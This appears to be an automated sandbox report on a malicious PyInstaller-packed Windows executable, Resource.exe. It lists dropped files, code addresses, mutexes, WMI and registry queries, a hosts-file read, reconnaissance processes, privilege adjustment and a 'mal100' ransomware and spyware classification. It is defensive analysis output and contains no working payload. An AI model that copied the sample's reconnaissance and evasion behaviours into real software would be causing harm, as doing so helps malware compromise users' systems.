Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D54C0	103_2_00007FF6185D54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CB540	103_2_00007FF6185CB540
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C1884	103_2_00007FF6185C1884
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185ED97C	103_2_00007FF6185ED97C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186069FD	103_2_00007FF6186069FD
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C49B8	103_2_00007FF6185C49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618605A70	103_2_00007FF618605A70
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FFA6C	103_2_00007FF6185FFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CCB14	103_2_00007FF6185CCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61862AAC0	103_2_00007FF61862AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618619B98	103_2_00007FF618619B98
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618604B38	103_2_00007FF618604B38
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D8C30	103_2_00007FF6185D8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618605C8C	103_2_00007FF618605C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F0D20	103_2_00007FF6185F0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CDD04	103_2_00007FF6185CDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618616D0C	103_2_00007FF618616D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E9D0C	103_2_00007FF6185E9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618609D74	103_2_00007FF618609D74
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D1E04	103_2_00007FF6185D1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CEE08	103_2_00007FF6185CEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618611DCC	103_2_00007FF618611DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61860EEA4	103_2_00007FF61860EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CCE84	103_2_00007FF6185CCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861FE74	103_2_00007FF61861FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D8E68	103_2_00007FF6185D8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61860AE50	103_2_00007FF61860AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C9EFC	103_2_00007FF6185C9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FAF0C	103_2_00007FF6185FAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61862AF90	103_2_00007FF61862AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F5F4C	103_2_00007FF6185F5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D3030	103_2_00007FF6185D3030
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FC00C	103_2_00007FF6185FC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61862DFD8	103_2_00007FF61862DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618604FE8	103_2_00007FF618604FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185EC05C	103_2_00007FF6185EC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F0074	103_2_00007FF6185F0074
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F8040	103_2_00007FF6185F8040
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E0104	103_2_00007FF6185E0104
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186200F0	103_2_00007FF6186200F0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618602164	103_2_00007FF618602164
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185DE21C	103_2_00007FF6185DE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186081CC	103_2_00007FF6186081CC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186241CC	103_2_00007FF6186241CC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186002A4	103_2_00007FF6186002A4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618612268	103_2_00007FF618612268
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E7244	103_2_00007FF6185E7244
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CF24C	103_2_00007FF6185CF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861832C	103_2_00007FF61861832C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618611314	103_2_00007FF618611314
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C42E0	103_2_00007FF6185C42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185DD2C0	103_2_00007FF6185DD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D2360	103_2_00007FF6185D2360
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F0374	103_2_00007FF6185F0374
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185EC3E0	103_2_00007FF6185EC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185ED458	103_2_00007FF6185ED458
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618605468	103_2_00007FF618605468
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185CA504	103_2_00007FF6185CA504
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FF59C	103_2_00007FF6185FF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D8598	103_2_00007FF6185D8598
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185EF5B0	103_2_00007FF6185EF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61861260C	103_2_00007FF61861260C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F65FC	103_2_00007FF6185F65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618617660	103_2_00007FF618617660
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618602700	103_2_00007FF618602700
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FA710	103_2_00007FF6185FA710
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF618600710	103_2_00007FF618600710
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D86C4	103_2_00007FF6185D86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186286D4	103_2_00007FF6186286D4
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185E67E0	103_2_00007FF6185E67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D17C8	103_2_00007FF6185D17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6186118A8	103_2_00007FF6186118A8
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185C8884	103_2_00007FF6185C8884
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185D2890	103_2_00007FF6185D2890
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185FD91C	103_2_00007FF6185FD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F0904	103_2_00007FF6185F0904
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61860190C	103_2_00007FF61860190C
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185F38E8	103_2_00007FF6185F38E8

Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF6E60A2B30 appears 47 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8B7E1DAF0 appears 46 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934CD8F appears 330 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A87D9D60 appears 155 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934CD9B appears 39 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934CE79 appears 49 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A87D8C40 appears 31 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934D545 appears 39 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934D551 appears 69 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934CF69 appears 31 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A87D8E10 appears 128 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A87FFEC0 appears 38 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8B7E1DC10 appears 83 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A92D132A appears 519 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8B7E58568 appears 152 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8A934CDA1 appears 1188 times
Source: C:\Users\user\Desktop\Resource.exe	Code function: String function: 00007FF8B7E584D8 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: String function: 00007FF6186049F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: String function: 00007FF6185D8444 appears 48 times

Source: Resource.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs Resource.exe
Source: Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2487238421.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2486636553.00007FF8B8F92000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs Resource.exe
Source: Resource.exe, 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2486397800.00007FF8B8B4C000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2486844907.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2484391036.00007FF8A8F2B000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython311.dll. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2487700172.00007FF8BFAC7000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs Resource.exe
Source: Resource.exe, 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs Resource.exe
Source: Resource.exe, 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs Resource.exe
Source: Resource.exe, 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs Resource.exe
Source: Resource.exe, 00000001.00000002.2487039131.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs Resource.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\Resource.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\Resource.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python311.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9942873714221825

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60A8560 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF6E60A8560

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF6185DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		103_2_00007FF6185DEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Code function: 103_2_00007FF61860B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		103_2_00007FF61860B57C

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Code function: 103_2_00007FF6185E3144 GetDiskFreeSpaceExW,

103_2_00007FF6185E3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Users\user\Desktop\Resource.exe	Mutant created: \Sessions\1\BaseNamedObjects\J
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\Users\user\Desktop\Resource.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI66322

Jump to behavior

Source: Resource.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Resource.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Resource.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Resource.exe	Virustotal: Detection: 71%
Source: Resource.exe	ReversingLabs: Detection: 65%

Source: Resource.exe	String found in binary or memory: set-addPolicy
Source: Resource.exe	String found in binary or memory: id-cmc-addExtensions
Source: Resource.exe	String found in binary or memory: --help
Source: Resource.exe	String found in binary or memory: --help
Source: Resource.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
